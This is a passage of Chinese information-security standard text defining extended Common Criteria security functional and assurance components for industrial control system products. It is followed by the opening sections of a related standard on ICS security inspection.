FDP_DTI_EXT.2 TOE 内部传送数据完整性 从属于:无其他组件。 依赖关系:无依赖关系。 FDP_DTI_EXT.2 TOE 应能检测在 TOE 内部不同部分间传送数据的[选择:修改、替换、重排、重 放、删除、延迟]等完整性错误,当检测到完整性错误后,TOE 应采取相关的动作[赋值:动作列表]。 应用说明: a) 选择一个或多个完整性错误类型,根据实体情况来定,如果 TOE 属于分布式,两个部分位于 不同的地方,应考虑全面的完整性错误类型; b) 赋值动作列表,如丢弃接收到的错误数据等。 7.2.7 数据传输保密性(FDP_DTC_EXT) 7.2.7.1 类别 所属类别为 GB/T 18336.2—2015 中定义的 FDP 类:用户数据保护。 7.2.7.2 族行为 本族规定了传输数据的保密性,防止未授权的通信数据窃听,主要针对敏感数据(如鉴别数据、密 钥、安全配置等)和系统重要的应用通信数据(如控制参数等)。 7.2.7.3 组件层次 FDP_DTC_EXT.1“TOE 与外部实体传送数据保密性”,TOE 应在与外部实体之间发送及接收数 据时提供数据保密性保护的能力。 FDP_DTC_EXT.2“TOE 内部传送数据保密性”,TOE 应在内部发送和接收数据时提供数据保密 性保护的能力。 7.2.7.4 FDP_DTC_EXT.1 、FDP_DTC_EXT.2 管理 尚无预见的管理活动。 7.2.7.5 FDP_DTC_EXT.1、FDP_DTC_EXT.2 审计 尚无预见的可审计事件。 7.2.7.6 FDP_DTC_EXT.1 TOE 与外部实体传送数据保密性 从属于:无其他组件。 依赖关系:无依赖关系。 FDP_DTC_EXT.1.1当 TOE 与[赋 值 :外部实体]传送[赋值:数据类型]时,TOE 应具备能力保护传 送数据免遭未授权泄露(如对传送数据进行加密防护等)。 应用说明: a) 赋值与 TOE 通信的外部实体,如果有多个,应进行识别,然后分别进行描述; b) 本要求指通信应用层的加密防护,而FTP_ITC.1 可信信道侧重传输层的加密防护。 7.2.7.7 FDP_DTC_EXT.2 TOE 内部传送数据保密性 从属于:无其他组件。 依赖关系:无依赖关系。 FDP_DTC_EXT.2.1 TOE 应保护敏感数据在 TOE 不同部分间传送时不被泄露。 应用说明: a) TOE 的不同部分物理上可以在一起或不在一起(如分布式); b) 可以采取加密传输或可信信道。 7.2.8 用户标识(FIA_UID) 7.2.8.1 类别 所属类别为 GB/T 18336.2—2015 中定义的 FIA 类:标识和鉴别。 7.2.8.2 族行为 本族定义了在执行任何其他有 TSF 促成的且需要用户标识的动作前,要求用户标识其身份的条 件。对于访问 TOE 的外部实体标识应具备唯一性,本族扩展了FIA_UID_EXT.3 “唯一性标识”组件。 7.2.8.3 组件层次 FIA_UID_EXT.3 “唯一性标识”,TOE 应在对外接口提供唯一性标识用户的能力。 7.2.8.4 FIA_UID_EXT.3 管理 尚无预见的管理活动。 7.2.8.5 FIA_UID_EXT.3 审计 尚无预见的审计活动。 7.2.8.6 FIA_UID_EXT.3 唯一性标识 从属于:无其他组件。 依赖关系:无依赖关系。 FIA_UID_图EXT.3.1 TSF应在对外接口提供唯一性标识用户(人员、软件进程和设备)的能力,且标 识不可被篡改和分离。 应用说明:TOE 应对外部接口用户提供标识,如远程网络接口、上位机控制进程等,典型的标识方 式如设备的 ID 、MAC 地址、用户 ID 等,如有些不能进行标识的实体应进行说明。 7.2.9 用户鉴别(FIA_UAU) 7.2.9.1 类别 所属类别为GB/T18336.2—2015 中定义的 FIA 类:标识和鉴别。 7.2.9.2 族行为 本族在既有组件的基础上,重新定义了外部实体在允许访问 TOE 之前需满足的行为活动。开发 者应制定所有外部实体列表(人员、软件进程或设备等),并在通信前通过对任何请求访问 TOE 的外部 实体进行身份验证来保护TOE, 任何请求访问 TOE 的外部实体,应在验证身份后才能激活通信。 7.2.9.3 组件层次 FIA_UAU_EXT.1 “外部实体鉴别”,外部实体在被鉴别前可执行部分由TOE 促成的动作列表,但 若执行任何其他由TOE 促成的动作前,应成功被鉴别。 7.2.9.4 FIA_UAU_EXT.1 管理 尚无预见的管理活动。 7.2.9.5 FIA_UAU_EXT.1 审计 尚无预见的审计活动。 7.2.9.6 FIA_UAU_EXT.1 外部实体鉴别 从属于:无其他组件。 依赖关系:无依赖关系。 FIA_UAU_EXT.1.1 在外部实体[选择:人员、软件进程、设备]被鉴别前,TOE 应允许执行代表外部 实体的[赋值:由TOE 促成的动作列表]。 FIA_UAU_EXT.1.2 在允许执行代表该外部实体的任何其他由TOE 促成的动作前,TOE 应要求每 个外部实体都已被成功鉴别。 应用说明: a) 赋值动作列表可以填无或允许的动作列表; b) 应分析和分类所有通过 TOE 外部接口与TOE 进行交互的外部实体,分别对这些外部实体的 鉴别进行说明。 7.2.10 TSF 物理保护(FPT_PHP) 7.2.10.1 类别 所属类别为GB/T18336.2—2015 中定义的 FPT 类 :TSF 保护。 7.2.10.2 族行为 TSF 物理保护组件涉及限制对 TSF 进行未授权的物理访问,以及阻止和抵抗对 TSF 进行未授权的物理修改或替换。 本族中组件的要求确保了TSF 不被物理侵害和干扰。若满足了这些组件要求,TSF 就可以被封装 起来使用,并可检测出物理侵害或抵抗物理侵害。如果没有这些组件,在物理性损害无法避免的环境 中 ,TSF 的保护功能就会失效。关于TSF 如何对物理侵害尝试作出反应,本族也提供了要求。 为实现适应ICS 现场环境对 TOE 的要求,扩展了FPT_PHP_EXT.4 “物理环境要求”,FPT_PHP_ EXT.5“物理篡改防护”。 7.2.10.3 组件层次 FPT_PHP_EXT.4 “物理环境要求”,规定了 TOE 设备在ICS 中应满足的物理环境指标要求。 FPT_PHP_EXT.5 “物理篡改防护”,规定了 TOE 设备可以通过封装和设计使得难以对其进行物 理篡改。 7.2.10.4 FPT_PHP_EXT.4 、FPT_PHP_EXT.5 管理 尚无预见的管理活动。 7.2.10.5 FPT_PHP_EXT.4、FPT_PHP_EXT.5 审计 尚无预见的可审计事件。 7.2.10.6 FPT_PHP_EXT.4 物理环境要求 从属于:无其他组件。 依赖关系:无依赖关系。 FPT_PHP_EXT.4.1 TSF 应具备符合下列标准[赋值:标准列表]中规定的[赋值:物理侵害类型]的 [赋值:度量或等级]的防护能力。 应用说明: a) 不同行业有不同的针对物理环境的要求,应赋值具体的标准; b) 物理侵害类型可以包含电磁辐射、抗浪涌(冲击)、高低温、化学品侵害、IP 防护等等; c) 针对每种物理侵害有些标准会规定不同的防护等级。 7.2.10.7 FPT_PHP_EXT.5 物理篡改防护 从属于:无其他组件。 依赖关系:无依赖关系。 FPT_PHP_EXT.5.1 TOE 应针对未授权的物理破坏提供物理防篡改的机制。 应用说明:防篡改机制可以防止攻击者对 TOE 进行未授权的物理访问,防篡改机制可以通过使用 特殊材料或设计来实现,如封装、锁闭等。 7.2.11 失效保护(FPT_FLS) 7.2.11.1 类别 所属类别为 GB/T 18336.2—2015 中定义的 FPT 类 :TSF 保护。 7.2.11.2 族行为 本族要求确保当 TSF 中已确定的失效类型出现时,该 TOE 总是执行它的 SFR 。 在 ICS 中,当 TOE 失效后应以不影响 ICS 系统自身的功能安全为首要目标,因此是否继续维持执行 SFR 应根据具体情况进行分析。本族扩展了组件 FPT_FLS_EXT.2 “确定性输出”。 7.2.11.3 组件层次 FPT_FLS_EXT.2 “确定性输出”,要求在受到攻击或 TOE 失效后正常操作不能保持时,设定输出 为预定义状态的能力。 7.2.11.4 FPT_FLS_EXT.2 管理 FMT 中的管理功能可考虑下列行为: 对预定义状态的管理(添加、删除或修改)。 7.2.11.5 FPT_FLS_EXT.2 审计 如果 PP/ST 中包含 FAU_GEN“安全审计数据产生”,下列行为应是可审计的: 基本级:TOE 失效。 7.2.11.6 FPT_FLS_EXT.2 确定性输出 从属于:无其他组件。 依赖关系:无依赖关系。 FPT_FLS_EXT.2.1 TOE 在受到攻击或失效后,如果不能维持正常操作,应输出预先设定的安全状 态,该状态的输出应考虑 TOE 在工业控制系统中的应用,不应对工业控制系统的安全性和可用性造成 影响。 应用说明: a) 失效类型可以包括硬件故障、软件故障、断电等; b) 预先设定的失败状态由开发者根据工业控制系统应用环境定义,如输出保持某一状态或某一 固定值等。示例,如工控防火墙失效后输出导通状态或阻断状态等。 7.2.12 时间戳(FPT_STM) 7.2.12.1 类 别 所属类别为GB/T18336.2—2015 中定义的 FPT 类 :TSF 保护。 7.2.12.2 族行为 本族对一个 TOE 内可靠的时间戳功能提出要求,ICS 系统的正常运行大部分依靠时间同步服务器 来同步时间,如果时间同步失败,会影响系统的正常运行,本族扩展了组件 FPT_STM_EXT.2 “时间同 步”。 7.2.12.3 组件层次 FPT_STM_EXT.2 “时间同步”,TOE 应提供可靠的时间戳,并可实现时钟同步功能。 7.2.12.4 FPT_STM_EXT.2 管理 尚无预见的管理活动。 7.2.12.5 FPT_STM_EXT.2 审计 如果 PP/ST 中包含 FAU_GEN“安全审计数据产生”,下列行为应是可审计的: a) 基本级:时间同步失败; b) 基本级:时间源被篡改。 7.2.12.6 FPT_STM_EXT.2 时间同步 从属于:无其他组件。 依赖关系:无依赖关系。 FPT_STM_EXT.2.1 TOE 应具备同步TOE 内部各部分系统时钟的能力,并提供统一的时间基准。 FPT_STM_EXT.2.2 TOE 应保护时间源防止非授权改动, 一旦改动则生成审计事件。 应用说明:ICS 系统通常具备统一的时钟源,各部分的通信需要时间同步,因此 TOE 应确保时间同 步的能力。 7.2.13 资源备份(FRU_RUB_EXT) 7.2.13.1 类别 所属类别为 GB/T 18336.2—2015 中定义的 FRU 类:资源利用。 7.2.13.2 族行为 本族为扩展的FIA_RUB 族,要求 TOE 设备应在不影响正常设备使用的前提下,提供关键文件的 识别和定位,以及信息备份(包括系统状态信息)的能力。 7.2.13.3 组件层次 FRU_RUB.EXT.1 “数据备份”,要求在不影响设备正常适应的情况下,TOE 设备可对信息进行 备份、 7.2.13.4 FRU_RUB_EXT.1 管理 尚无预见的管理活动。 7.2.13.5 FIA_RUB_EXT.1 审计 尚无预见的审计活动。 7.2.13.6 FRU_RUB.EXT.1 数据备份 从属于:无其他组件。 依赖关系:无依赖关系。 FRU_RUB_EXT.1.1 TOE设备应在不影响正常设备使用的前提下,提供关键文件的识别和定位,并 根据可配置的频率进行信息备份的能力。 7.3 安全保障组件扩展定义 7.3.1 测试人员(ATE_TES) 7.3.1.1 类别 所属类别为 GB/T 18336.3—2015 中定义的 ATE 类:测试。 7.3.1.2 目的 本族的组件涉及测试人员的组成。TOE 测试人员的独立性会影响测试结果的准确性。本族的目 的是降低测试人员在TOE 测试中存在的人为错误风险,有助于保障未知缺陷出现的可能性相对较小。 7.3.1.3 组件分级 本族中的组件分级是基于测试独立性的严格程度分级的。 7.3.1.4 应用注释 在执行测试的过程中最好确保测试人员的独立性,可以有效地避免因开发者和测试者来自同一人 或同一部门导致的测试结果异议。 7.3.2 组件定义 7.3.2.1 ATE_TES_EXT.1 测试人员 7.3.2.1.1 目的 本组件的目的是避免开发人员对 TOE 进行测试导致的测试结果误差。 依赖关系:ATE_FUN.1 功能测试。 7.3.2.1.2 开发者行为元素 ATE_TES_EXT.1.1D 开发者应提供测试文档。 7.3.2.1.3 内容和形式元素 ATE_TES_EXT.1.1C 对 TOE 进行测试的测试人员与开发人员应不是同一个人。 7.3.2.1.4 评估者行为元素 ATE_TES_EXT.1.1E 评估者应确认所提供的信息满足证据内容和形式的所有要求。 7.3.2.2 ATE_TES_EXT.2 独立的测试人员 7.3.2.2.1 目的 本组件的目的是通过不同部门的独立测试确保测试的公正性。 依赖关系:ATE_FUN.1 功能测试。 7.3.2.2.2 开发者行为元素 ATE_TES_EXT.2.1D 开发者应提交由独立测试部门测试的文档。 7.3.2.2.3 内容和形式元素 ATE_TES_EXT.2.1C 对 TOE 进行测试的测试人员与开发人员应不属于同一部门。 7.3.2.2.4 评估者行为元素 ATE_TES_EXT.2.1E 评估者应确认所提供的信息满足证据内容和形式的所有要求。 8 工业控制系统产品安全要求 8.1 安全功能要求 8.1.1 安全审计 注:安全审计功能包括识别、记录、存储和分析那些与安全相关活动有关的信息。安全审计有助于监测与安全有关的事件,并能对安全侵害起到威慑作用。与安全审计功能相关的子功能包括安全审计事件的记录、安全审计记 录的查阅、安全审计记录的存储和安全审计事件的分析。 8.1.1.1 安全审计事件记录 与安全审计事件记录相关的安全功能组件包括:FAU_GEN.1 、FAU_GEN.2 和 FAU_SEL.1。 a) 组件 FAU_GEN.1 用于定义用于审计的安全事件,对 ICS 系统重要或相关的事件应被审计, 但考虑到审计活动会影响到ICS 的性能,因此开发者在考虑审计事件列表时,应考虑通常公认 和被接受的清单和配置指南; b) 组件 FAU_GEN.1 可被执行反复操作,记录网络状态数据(如 MAC 、IP、端口、协议等)和数据 流等信息用于监视异常事件的出现; c) 组件 FAU_GEN.2 仅适用于处理单个用户身份级别上可审计事件的责任追溯,对于基于用户 角色和用户组的访问方式不适用本组件; d) 组件 FAU_SEL.1 允许安全审计事件列表可由授权管理员进行配置,如在某些特殊情况下(如 审计迹空间不足)仅选择重要事件进行审计等。如选择本组件,需要在 FMT_SMR.1 中定义 被授权修改审计列表的角色或用户。 8.1.1.2 安全审计事件查阅 与安全审计事件查阅相关的安全功能组件包括:FAU_SAR.1 、FAU_SAR.2 、FAU_SAR.3 和FAU_SAR_EXT.4。 a) 组件 FAU_SAR.1 应授权读取审计记录的角色,如管理员或审计员,安全角色需在 FMT_ SMR.1 中进行定义; b) 组件 FAU_SAR.2 应除被授权角色外,默认设置拒绝所有用户访问; c) 组件 FAU_SAR.3 可对所记录的审计事件进行选择性查阅,便于对可疑事件进行统计和定位; d) 组件 FAU_SAR_EXT.4 针对存储容量受限的设备或 ICS 系统需要进行集中审计时选用此组 件,审计事件在传送到外部实体时应确保通道的通信安全。 8.1.1.3 安全审计事件存储 与安全审计事件存储相关的安全功能组件包括:FAU_STG.1 、FAU_STG.2 、FAU_STG.3 和FAU_STG.4。 a) 组件 FAU_STG.1 和 FAU_STG.2 定义防止审计迹中审计记录的未授权修改或删除; b) 组件 FAU_STG.3 和 FAU_STG.4 定义在发生失效事件时应确保审计记录的可用性。开发者 应根据实际情况对 TOE 进行赋值。 8.1.1.4 安全审计事件分析 与安全审计事件分析相关的安全功能组件包括:FAU_ARP.1、FAU_SAA.1、FAU_SAA.3、FAU_ SAA_EXT.5 和 FAU_SAA_EXT.6。 a) 组件 FAU_ARP.1 用于定义安全告警的方式,如声音、屏幕提示、锁定登录等。 b) 组件 FAU_SAA.1 、FAU_SAA.3 和 FAU_SAA_EXT.5 采用了不同的规则来监视审计事件的 异常,开发者根据实际情况进行选择和赋值。典型异常事件包括用户异常登录次数超过限值、 网络流量异常、控制数据修改异常、恶意代码或异常进程启动等。 c) 组件 FAU_SAA_EXT.6 定义了对网络协议(含工业控制协议)的解析能力。 8.1.2 标识和鉴别 注:TOE 具备标识鉴别功能,是为防止外部实体未授权的登录、访问TOE, 并对要保护的资产造成破坏。开发者根 据TOE运行环境和威胁分析情况,在 TOE的所有外部接口上考虑标识和鉴别机制的应用。 8.1.2.1 外部实体标识 TOE 在对外部实体进行鉴别前,应首先具备对其进行标识的能力,尤其是需要在 TOE 进行注册 的用户,与外部实体标识相关的安全功能组件包括:FIA_UID.1 、FIA_UID.2 、FIA_UID_EXT.3 和FIA_ATD.1。 a) 组件 FIA_UID.1 和 FIA_UID.2 定义在 TOE 对外部实体执行仲裁动作前,如允许建立通信连 接前、可执行有效鉴别前,需要对外部实体进行成功标识; b) 组件 FIA_UID_EXT.3 要求外部实体标识应具备唯一性; c) TSF 应识别所有可能访问 TOE 的外部实体,并明确其标识及对应的安全属性、角色等,组件 FIA_ATD.1 定义用户的安全属性,FMT_MSA 族“安全属性的管理”侧重管理权限和职责的 明确。 8.1.2.2 外部实体鉴别 对外部实体进行安全鉴别可防止未授权的访问,与鉴别相关的安全功能组件包括:FIA_UAU. EXT.1 、FIA_UAU.5 、FIA_UAU.6 和 FIA_AFL.1。 a) 组件 FIA_UAU_EXT.1 定义了外部实体在访问或登录 TOE 前应成功完成鉴别。外部实体 可包含人类用户、软件进程或设备等,因此识别和梳理需要进行鉴别的实体是必须的。 b) 组件 FIA_UAU.5 定义了可实现多重鉴别机制,常用的鉴别机制分为基于密码、PIN 等(你所 知道的)、基于令牌、智能卡等(你所拥有的)和基本生物特征的(你所具备的),如果采取其中两 种或三种可选择该组件。 c) 组件 FIA_UAU.6 定义需要重新鉴别的条件,如在用户长时间未活动退出或锁屏等。 d) 组件 FIA_AFL.1 是为防止恶意猜测鉴别数据的行为而设定的保护机制,如未成功登录次数 达到限值时的动作,对于数值的设定等应在FMT_SMR.1 和FMT_MTD.1 中定义授权角色和 职责。 8.1.2.3 鉴别数据的保护 鉴别数据在TOE 中属于敏感数据, 一旦被窃取利用将会对资产产生破坏,因此应确保鉴别数据在 传输和存储时的安全。与鉴别数据保护相关的安全功能组件包括:FIA_UAU.3 、FIA_UAU.4 、FIA UAU.7 、FTP_TRP.1 和 FDP_SDC_EXT.1。 a) 组件 FIA_UAU.3 和 FIA_UAU.4 防止鉴别机制被伪造和重用; b) 组件 FIA_UAU.7 定义用户在输入鉴别数据时应被保护; c) 组件 FTP_TRP.1 和 FDP_SDC_EXT.1 确保鉴别数据在传输和存储时的完整性和保密性。 8.1.2.4 鉴别数据的强度 与鉴别数据的强度相关的安全功能组件包括:FIA_SOS.1。 组件 FIA_SOS.1 可定义鉴别数据需要满足的强度,如规定密码的最小长度、最低复杂度和密钥的 算法强度等。 8.1.3 访问控制 访问控制策略包括访问控制策略和信息流访问控制策略,访问控制策略控制范围包括策略控制下 的主体、策略控制下的客体以及策略所涵盖受控主体和受控客体间的操作。信息流控制策略控制范围 包括策略控制下的主体、策略控制下的信息以及策略所涵盖的引起受控信息流入、流出受控主体的操作。每一种策略应采用唯一的名称,可通过组件的反复操作来实现多个策略的定义。相关的安全功能 组件包括:FDP_ACC.1 、FDP_ACC.2 、FDP_ACF.1 、FDP_IFC.1 、FDP_IFC.2 和 FDP_IFF.1。 a) 组件 FDP_ACC.1 、FDP_ACC.2 和 FDP_ACF.1 用来建立访问控制策略和访问控制功能,访问 控制策略可以是基于用户角色、用户组、物理位置、时间等属性建立,每个不同的策略应分别命 名,用户角色应在 FMT_SMR.1 中定义,安全属性的管理应在 FMT_MSA 族中进行定义; b) 组件 FDP_IFC.1 、FDP_IFC.2 和 FDP_IFF.1 用来建立信息流访问控制策略和访问控制功能, 访问控制策略可以是基于源目标IP、源目标 MAC 和网络协议等属性建立,每个不同的策略应 分别命名。 8.1.4 会话安全 建立和维护用户会话的安全可以防止会话劫持、并发会话占用 TOE 资源等事件。与会话建立和 管理相关的安全功能组件包括:FTA_TSE.1 、FTA_LSA.1 、FTA_MCS.1 、FTA_SSL.1 、FTA_SSL.2 、 FTA_SSL.3 、FTA_SSL.4 、FTA_TAB.1和 FTA_TAH.1。 a) 组件 FTA_TSE.1 和 FTA_LSA.1 定义建立会话连接的安全,属于访问控制策略的一种,建立 基于会话属性的会话建立机制; b) 组件 FTA_MCS.1 限制同一用户的并发会话数量,可防止发生资源耗尽的 DoS; c) 组件 FTA_SSI.1 和 FTA_SS1.3 定义了TOE 锁定和终止会话的要求,在工业控制系统中不是 所有情况下都可以采用该要求,对于操作员站的监控软件,由于要确保业务的连续性,即使操 作员不动作也不应对会话进行锁定和终止,因此 TOE 为了确保安全,应假定运行环境的安全 来抵御预期的威胁; d) 组件 FTA_SS1.2 和 FTA_SS1.4 定义了用户锁定和终止会话的要求; e) 组件 FTA_TAB.1 和 FTA_TAH.1 起到会话安全建立的提示和警告的作用。 8.1.5 安全通信 8.1.5.1 可信路径/信道 TOE 可支持在用户与 TOE 之间建立可信路径以及 TOE 和外部IT 实体间建立可信信道的要求, 可信路径和信道具备通信完整性和保密性要求,且提供通信两端端点身份的抗抵赖性。相关的安全功 能组件包括:FTP_ITC.1 和 FTP_TRP.1。 组件 FTP_ITC.1 和 FTP_TRP.1 定义了TOE 与用户或外部IT 实体间的可信路径和信道,如采用 HTTPS 的方式,采用 IPSEC 的方式等。为了保护鉴别数据不被泄露和篡改,用户鉴别应采用可信 路径。 8.1.5.2 通信完整性 如 TOE 不具备满足可信路径或通道的条件,应通过 TOE 实现通信数据完整性的保护。相关的安 全功能组件包括:FDP_DTI.1 和 FDP_DTI.2。 组件 FDP_DTI.1 和 FDP_DTI.2 定义了 TOE 与外部IT 实体或 TOE 内部的一部分进行通信时的 数据完整性保护要求。 8.1.5.3 通信保密性 如 TOE 不具备满足可信路径或通道的条件,应通过 TOE 实现通信数据保密性的保护。相关的安 全功能组件包括:FDP_DTC.1 和 FDP_DTC.2。 组件 FDP_DTC.1 和 FDP_DTC.2 定义了 TOE 与外部 IT 实体或 TOE 内部的一部分进行通信时的数据保密性保护要求。由于工业控制系统中实时性要求较高,因此可仅对关键和敏感数据采用保密 性保护。 8.1.5.4 重放检测 TOE 应能对各种类型实体(如消息、服务请求、服务应答)的重放进行检测,并在检测到重放后采取 一定的措施进行保护。与重放检测相关的安全功能组件包括:FPT_RPL.1。 组件 FPT_RPL.1 可定义对通信数据进行重放的检测及纠正动作。 8.1.5.5 状态和时间同步 分布式 TOE 由于存在 TOE 各部分间潜在的状态差别及通信延迟等问题,因此需要在通信时实现 状态和时间同步的要求。相关的安全功能组件包括:FPT_SSP.1 、FPT_SSP.2 和 FPT_STM_EXE.2。 a) 组件 FPT_SSP.1 和 FPT_SSP.2 定义 TOE 不同部分间通信时应对请求进行回执,以确保各部 分状态保持一致; b) 组件 FPT_STM_EXE.2 确保各部分间的时钟进行同步。 8.1.6 数据/代码保护 8.1.6.1 完整性保护 要求 TOE 在初始阶段、运行阶段或更新阶段可以对固件、可执行代码、关键配置数据等的完整性 错误进行检测,相关的安全功能组件包括:FDP_SDI_EXT.1。 组件 FDP_SDI_EXT.1 定义了数据、固件、可执行代码等的完整性保护。 8.1.6.2 输入数据保护 用户在输入数据时,应避免数据的不合法、超限等错误,且必要时需要双重确认和动作的回退等。 相关的安全功能组件包括:FDP_IDP_EXT.1 、FDP_IDP_EXT.2 和 FDP_ROL.1。 a) 组件 FDP_IDP_EXT.1 可对输入数据的合法性和安全性进行检测; b) 组件 FDP_IDP_EXT.2 要求对输入的数据执行双重确认操作; c) 组件 FDP_ROL.1 允许用户从配置和其他管理错误中快速恢复。 8.1.6.3 残余信息防护 要求确保当资源从一个客体释放并重新分配给另一个客体时,其中的任何数据均不可用。相关的 安全功能组件包括:FDP_RIP.1。 组件 FDP_RIP.1 要求确保任何资源的任何残余信息在资源分配或释放时不可用。 8.1.7 加密 当 TOE 具备加密运算模块及数据签名的生成和验证时,应考虑密钥管理和密码运算的功能,相关 的安全功能组件包括:FCS_CKM.1 、FCS_CKM.2 、FCS_CKM.3 、FCS_CKM.4 和 FCS_COP.1 。 在使用 密码技术时应遵循密码相关标准和行业密码标准的规定。 8.1.8 安全管理 TOE 的安全管理功能不是一个独立的功能,管理操作与其他安全功能都相关,如安全角色的定义, 与安全审计、身份鉴别、访问控制的功能的用户角色都相关,安全管理功能涉及安全角色的定义,安全管 理功能的定义,安全属性的管理、TSF 数据的管理等。 a) 与安全管理角色相关的安全组件 FMT_SMR.1 可以定义 TOE 设计到的安全角色,如管理员、 审计员、操作员、工程师、普通用户等角色; b) 与安全管理功能相关的安全组件 FMT_SMF.1 可以定义 TOE 具备的安全管理功能,这些功 能可能会与之前的功能有重复,但需要利用该组件独立定义所有与管理相关的功能,用以明确 管理角色和明确管理角色对应的管理功能,管理功能主要包括安全功能的管理、安全属性的管 理和 TSF 数据的管理等,可利用 FMT_MOF 、FMT_MSA 、FMT_MTD 等族下的组件进行定 义相关功能。 8.1.9 资源可用性 8.1.9.1 物理防护 TOE 应限制未授权的物理访问,以及阻止和抵抗对 TOE 进行未授权的物理修改或替换。相关的 安全功能组件包括:FPT_PHP.1 、FPT_PHP.2 、FPT_PHP.3 、FPT_PHP_EXT.4 和 FPT_PHP_EXT.5。 a) 组件 FPT_PHP.1 、FPT_PHP.2 和 FPT_PHP.3 定义了物理防护检测的能力; b) 组件 FPT_PHP_EXT.4 定义了物理环境适应性要求; c) 组件 FPT_PHP_EXT.5 定义了物理防篡改要求。 8.1.9.2 失效防护 TOE 在发生设备失效后应能导向安全状态,该安全状态应以维持工业控制系统基本功能的运行为 目的。相关的安全功能组件为 FPT_FLS_EXT.2 确定性输出。 8.1.9.3 TOE 测试 TOE 应在设备最初的启动、正常运行期间或授权用户要求下来检测所依托的外部环境或实体的正 确性以及 TOE 自身的正确性和完整性。相关的安全功能组件包括:FPT_TEE.1 和 FPT_TST.1。 8.1.9.4 备份与恢复 为保证系统的可用性,TOE 应具备资源备份及可信恢复的能力,相关的安全功能组件包括:FIA_ RUB_EXT.1 和 FPT_RCV 族。 8.1.9.5 资源利用 为防止 TOE 在发生 DoS 攻击时资源被耗尽,TOE 应具备服务优先级和资源合理分配的能力,相 关的安全功能组件包括 FRU_PRS 族和 FRU_RSA 族。 8.2 安全保障要求 本节定义了ICS 产品需要满足的四个安全保障等级 EAL1~EAL4 。 安全保障组件的定义和解释 参考GB/T 18336.3—2015,开发者需要根据安全保障要求准备相关的评估证据,评估者依据要求对评 估证据进行评估确认。
standards
信息安全技术 工业控制系统安全检查指南 Information security technology—Guide for security inspection of industrial control systems 随着工业化和信息化的深度融合,工业控制系统广泛应用于核设施、钢铁、有色、化工、石油石化、电 力、天然气、先进制造、水利枢纽、环境保护、铁路、城市轨道交通、民航、城市供水供气供热以及其他与国 计民生紧密相关的领域。工业控制系统指应用于工业领域的数据采集、监视与控制系统,是由计算机设 备、工业过程控制组件和网络组成的控制系统,是工业领域的神经中枢。工业领域使用的控制系统包括 监控与数据采集系统(SCADA) 、分布式控制系统(DCS) 、可编程逻辑控制器(PLC) 系统等。近年来针 对工业控制系统的攻击事件导出不穷,工业控制系统的安全性将直接关系到国家重要基础工业设施生 产的正常运行和广大公众的利益。 本标准制定的目的是为了指导我国国家关键基础设施中相关工业控制系统行业用户开展工业控制 系统信息安全自评工作,掌握工业控制系统信息安全总体状况,及时有效发现工业控制系统存在的问题 和薄弱环节,进一步健全工业控制系统信息安全管理制度,完善工业控制系统信息安全技术措施,提高 工业控制系统信息安全防护能力,为国家对重点行业工业控制系统信息安全检查等工作提供支撑,为实 现更安全的工业控制系统并在其内部进行有效的风险管理提供帮助。 信息安全技术 工业控制系统安全检查指南 1 范 围 本标准给出了工业控制系统信息安全检查的范围、方式、流程、方法和内容。 本标准适用于开展工业控制系统的信息安全监督检查、委托检查工作,同时也适用于各企业在本集 团(系统)范围内开展相关系统的信息安全自检查。 注:本标准适用的检查范围是广泛应用于核设施、钢铁、有色、化工、石油石化、电力、天然气、先进制造、水利枢纽、 环境保护、钢铁、城市轨道交通、民航、城市供水供气供热以及其他与国计民生紧密相关领域的工业控制系统。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。凡是注日期的引用文件,仅注日期的版本适用于本文 件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 25069—2010 信息安全技术 术语 GB/T 32919—2016 信息安全技术 工业控制系统安全控制应用指南 3 术语和定义 GB/T 25069—2010 和 GB/T 32919—2016 界定的以及下列术语和定义适用于本文件。 3.1 工业控制系统 industrial control system 由各种自动化控制组件以及对实时数据进行采集、监测的过程控制组件共同构成的确保工业基础 设施自动化运行、过程控制与监控的业务流程管控系统。 注:工业控制系统的核心组件包括监控和数据采集系统、分布式控制系统、可编程逻辑控制器、主终端单元、远程终 端单元、上位机,以及确保各组件通信的接口技术。 3.2 监控和数据采集系统 supervisory control and data acquisition system 在工业生产控制过程中,对大规模远距离地理分布的资产和设备在广域网环境下进行集中式数据 采集与监控管理的控制系统。 注:SCADA 系统以计算机为基础,对远程分布运行设备进行监控调度,其主要功能包括数据采集、参数测量和调 节、信息报警等。SCADA 系统一般由设在控制中心的主终端单元(MTU) 、通信线路和设备、远程终端单元 (RTU) 等组成。 3.3 分布式控制系统 distributed control system 以计算机为基础,在系统内部(单位内部)对生产过程进行分布控制、集中管理的系统。 注:DCS一般包括现场控制级、控制管理级两个层次,现场控制级主要是对单个过程进行控制,控制管理级主要是 对多个分散的子过程进行数据采集、统一调度和管理。 3.4 工业控制设备 industrial control device 对工业生产过程及装置进行检测与控制的设备。 3.5 可编程逻辑控制器 programmable logic controller 采用可编程存储器,通过数字运算操作对工业生产装备进行控制的电子设备。 注 :PLC 主要执行各类运算、顺序控制、定时执行等指令,用于控制工业生产装备的动作,是工业控制系统的主要 基础单元。 3.6 主终端单元 master terminal unit SCADA 系统中的服务器,用于集中控制,同远程终端单元进行通信。 3.7 远程终端单元 remote terminal unit 对较长通信距离和恶劣工业现场环境而设计的具有模块化结构的、特殊的计算机测控单元。 3.8 上位机 supervisory computer 直接发出操控命令的计算机。 3.9 控制网 control network 控制层网络,主要部署工程师站、操作员站、工业控制设备,为高安全等级的信任区域。 3.10 安全检查 security inspection 以查代促、以查促改、以查促管、以查促防,旨在推动提高信息安全工作能力和防护水平。 4 缩略语 下列缩略语适用于本文件。 ICS 工业控制系统(Industrial Control System) SCADA 监控和数据采集(Supervisory Control And Data Acquisition) DCS 分布式控制系统(Distributed Control System) PLC 可编程逻辑控制器(Programmable Logic Controller) MTU 主终端控制单元(Master Terminal Unit) RTU 远程终端单元(Remote Terminal Unit) 5 检查方式 5.1 监督检查 监督检查是指上级管理部门组织的或国家有关职能部门依法开展的检查。 监督检查可依据本标准的要求,实施完整的信息安全检查过程。 监督检查也可在自检查的基础上,对关键环节或重点内容实施检查。 5.2 自检查 自检查是指信息系统所有者、运营或使用单位发起的对本单位工业控制系统安全状况进行的检查。 自检查在本标准的指导下,结合系统特定的安全要求进行实施。 5.3 委托检查 受检单位或监督检查的组织部门不具备检查能力的,可委托经相关主管部门认可的机构开展检查。 6 检查工作流程 6.1 检查准备 6.1.1 概述 检查准备是开展检查工作的前提和基础,是整个检查过程有效性的保证。检查准备工作是否充分 